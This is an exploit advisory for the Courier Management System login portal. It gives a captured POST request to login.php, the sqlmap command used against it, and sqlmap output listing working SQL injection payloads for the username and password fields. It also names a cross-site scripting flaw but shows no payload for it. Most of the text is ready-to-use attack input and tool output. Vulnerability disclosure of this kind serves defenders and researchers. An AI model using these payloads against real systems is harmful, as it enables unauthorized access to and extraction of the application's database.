Courier Management System Cross Site Scripting / SQL Injection

`# Title : Courier Management System - Sql Injection and non-persistent XSS login portal  
# Date: 17 January 2017  
# Exploit Author: Sibusiso Sishi [email protected]  
# Tested on: Windows7 x32  
# Vendor: http://couriermanageme.sourceforge.net/  
# Version: not supplied  
# Download Software: https://sourceforge.net/projects/couriermanageme/files/  
  
#################################################  
  
## About The Product : ##  
Courier Management System is the simplest solution for Courier & Cargo Tracking Business. If you need to enable Tracking Option in your existing or new website, this is quickest Software Solution.You can get install it yourselves or We do the installation and brand it in your name on your hosting.The Courier Software is Very easy to setup and manage powerful administration. Provide online tracking system of consignment and shipping detail for International or domestic shipping  
  
## Vulnerability : ##   
The login portal is vulnerable to SQLi and cross-site scripting attacks  
  
-HTTP Method : POST  
  
POST /cms/login.php HTTP/1.1  
Host: 192.168.19.135  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.19.135/cms/login.php  
Cookie: PHPSESSID=q446r5fqav1qlljb7cohd29r85  
Connection: close  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 84  
  
txtusername=test&txtpassword=test&OfficeName=Fast+Courier+-+Jalgaon&Submit=Login+Now  
  
- Sqlmap command: sqlmap -r exploit.txt  
  
- Sqlmap Output :   
sqlmap identified the following injection point(s) with a total of 824 HTTP(s) requests:  
---  
Parameter: txtpassword (POST)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)  
Payload: txtusername=test&txtpassword=test' OR NOT 5887=5887#&OfficeName=Fast Courier - Jalgaon&Submit=Login Now  
  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: txtusername=test&txtpassword=test' AND (SELECT 9962 FROM(SELECT COUNT(*),CONCAT(0x71766a6b71,(SELECT (ELT(9962=9962,1))),0x717a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- CqJl&OfficeName=Fast Courier - Jalgaon&Submit=Login Now  
  
Type: AND/OR time-based blind  
Title: MySQL >= 5.0.12 OR time-based blind  
Payload: txtusername=test&txtpassword=test' OR SLEEP(5)-- VMai&OfficeName=Fast Courier - Jalgaon&Submit=Login Now  
  
Parameter: txtusername (POST)  
Type: boolean-based blind  
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause  
Payload: txtusername=test' RLIKE (SELECT (CASE WHEN (9742=9742) THEN 0x74657374 ELSE 0x28 END))-- FJke&txtpassword=test&OfficeName=Fast Courier - Jalgaon&Submit=Login Now  
  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: txtusername=test' AND (SELECT 6984 FROM(SELECT COUNT(*),CONCAT(0x71766a6b71,(SELECT (ELT(6984=6984,1))),0x717a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nDYx&txtpassword=test&OfficeName=Fast Courier - Jalgaon&Submit=Login Now  
  
Type: AND/OR time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: txtusername=test' AND (SELECT * FROM (SELECT(SLEEP(5)))Aols)-- LarG&txtpassword=test&OfficeName=Fast Courier - Jalgaon&Submit=Login Now  
---  
[16:59:17] [INFO] the back-end DBMS is MySQL  
web server operating system: Windows  
web application technology: Apache 2.4.23, PHP 5.6.24  
back-end DBMS: MySQL >= 5.0  
  
`